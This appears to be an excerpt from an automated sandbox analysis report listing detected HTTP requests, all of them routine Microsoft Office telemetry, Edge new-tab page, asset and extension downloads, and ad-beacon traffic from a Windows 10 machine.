                      Source: global trafficHTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /b?rn=1732096478832&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3EF9631D947761DE3FBC762095E360F1&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=3EF9631D947761DE3FBC762095E360F1&ACHANNEL=4&ABUILD=117.0.5938.150&clr=esdk&edgeid=5518710994624701133&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308|10837393&bcnt=1|1&asid=7c5f920c79414b2a9adf52030a3eeb3f HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=3EF9631D947761DE3FBC762095E360F1; _EDGE_S=F=1&SID=1DB44E30E65A66962E055B0DE7496740; _EDGE_V=1
                      Source: global trafficHTTP traffic detected: GET /b2?rn=1732096478832&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3EF9631D947761DE3FBC762095E360F1&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=11F3021ebc1f9b8b14c35221732096479; XID=11F3021ebc1f9b8b14c35221732096479
                      Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1msyCI.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1732096478832&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=ca65509b37634dae985e2ce2d7fe61e3&activityId=ca65509b37634dae985e2ce2d7fe61e3&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=7593A298CD5A4DECA2278AD6CEC6889E&MUID=3EF9631D947761DE3FBC762095E360F1 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=3EF9631D947761DE3FBC762095E360F1; _EDGE_S=F=1&SID=1DB44E30E65A66962E055B0DE7496740; _EDGE_V=1; SM=T
                      Source: global trafficHTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=3EF9631D947761DE3FBC762095E360F1&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.150&clr=esdk&edgeid=5518710994624701133&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=c2a5e7e5b1644721a5d386bce5ece879 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=3EF9631D947761DE3FBC762095E360F1; _EDGE_S=F=1&SID=1DB44E30E65A66962E055B0DE7496740; _EDGE_V=1
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1u24yb.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.55Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1msyO4.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1msFQB.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1732701275&P2=404&P3=2&P4=cxnbXxdIcScD5eKj7JDDD8dJuFCPIT0N7JuhmOiJ2jEYvryBWM3Dn1Qe6glNG5j59qgX%2fgwo4qKFvO01P7YWRQ%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: LvMS7QQkcrK+jvf8M6Ae4BSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
